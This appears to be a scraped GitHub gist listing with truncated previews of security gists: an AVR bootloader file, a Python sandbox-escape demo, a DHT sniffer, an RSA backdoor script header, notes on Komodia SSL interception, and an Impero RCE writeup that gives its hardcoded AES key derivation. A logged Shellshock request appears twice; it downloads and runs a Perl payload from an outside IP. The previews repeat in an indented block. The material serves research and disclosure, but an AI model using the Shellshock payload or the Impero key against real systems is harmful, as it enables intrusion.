hotelzululima hotelzululima

## BootJacker.c
#define SPIFbit 7
#define SPR (1<<0)
#define kSpmCsr 0x37
#define kSpmCsrMem (kSpmCsr+0x20)

#define IOAddrInsMask(aPort) (((aPort&0x30)<<5)|(aPort&7))

#define kBootloaderStart 0x7800
#define kMicroBootStart 0x7f80
#define kBootloaderEnd 0x8000

## poc.py
'''
A simple demonstration of obtaining, modifying and executing code objects in python without relying
on commonly blocked keywords such as exec, compile, etc...

-Patrick Biernat.
'''

import __builtin__

mydict = {}

## jur
GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22

## jur
GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22

## dht_sniff.py
#!/usr/bin/env python
"""
Sniff a specific port for Bit Torrent DHT traffic and print
requests/responses in human readable form.

Reference: http://www.bittorrent.org/beps/bep_0005.html
"""

from pcapy import open_live
from bencode import bdecode

## dht_sniff.py
#!/usr/bin/env python
"""
Sniff a specific port for Bit Torrent DHT traffic and print
requests/responses in human readable form.

Reference: http://www.bittorrent.org/beps/bep_0005.html
"""

from pcapy import open_live
from bencode import bdecode

## rsabd.py
#!/usr/bin/env python

import sys
import gmpy

import curve25519

from struct import pack
from hashlib import sha256
from binascii import hexlify, unhexlify

## rsabd.py
#!/usr/bin/env python

import sys
import gmpy

import curve25519

from struct import pack
from hashlib import sha256
from binascii import hexlify, unhexlify

## gist:3b04c78f05c539eed739
Superfish uses an SDK from Komodia to do SSL MITM. That's probably known by now.

Superfish isn't the only product to use that sdk. there's others too.

Each product that uses the Komodia SDK to MITM, has its OWN CA cert and private
key pair. Seems a lot of people think they all use the superfish cert. That is
NOT the case.

First thing I checked was komodia's own parental control software,
Keep My Family Secure. (mentioned on komodia's own website).

## impero-rce
If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/

They recently were in the news about how they implemented "anti-radicalisation" shit or something.

They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me.

Some reversing later, looks like Impero is completely pwned amirite.

The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used.
	#define SPIFbit 7
	#define SPR (1<<0)
	#define kSpmCsr 0x37
	#define kSpmCsrMem (kSpmCsr+0x20)

	#define IOAddrInsMask(aPort) (((aPort&0x30)<<5)\|(aPort&7))

	#define kBootloaderStart 0x7800
	#define kMicroBootStart 0x7f80
	#define kBootloaderEnd 0x8000
	'''
	A simple demonstration of obtaining, modifying and executing code objects in python without relying
	on commonly blocked keywords such as exec, compile, etc...

	-Patrick Biernat.
	'''

	import __builtin__

	mydict = {}
	#!/usr/bin/env python
	"""
	Sniff a specific port for Bit Torrent DHT traffic and print
	requests/responses in human readable form.

	Reference: http://www.bittorrent.org/beps/bep_0005.html
	"""

	from pcapy import open_live
	from bencode import bdecode
	#!/usr/bin/env python

	import sys
	import gmpy

	import curve25519

	from struct import pack
	from hashlib import sha256
	from binascii import hexlify, unhexlify
	Superfish uses an SDK from Komodia to do SSL MITM. That's probably known by now.

	Superfish isn't the only product to use that sdk. there's others too.

	Each product that uses the Komodia SDK to MITM, has its OWN CA cert and private
	key pair. Seems a lot of people think they all use the superfish cert. That is
	NOT the case.

	First thing I checked was komodia's own parental control software,
	Keep My Family Secure. (mentioned on komodia's own website).
	If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/

	They recently were in the news about how they implemented "anti-radicalisation" shit or something.

	They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me.

	Some reversing later, looks like Impero is completely pwned amirite.

	The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used.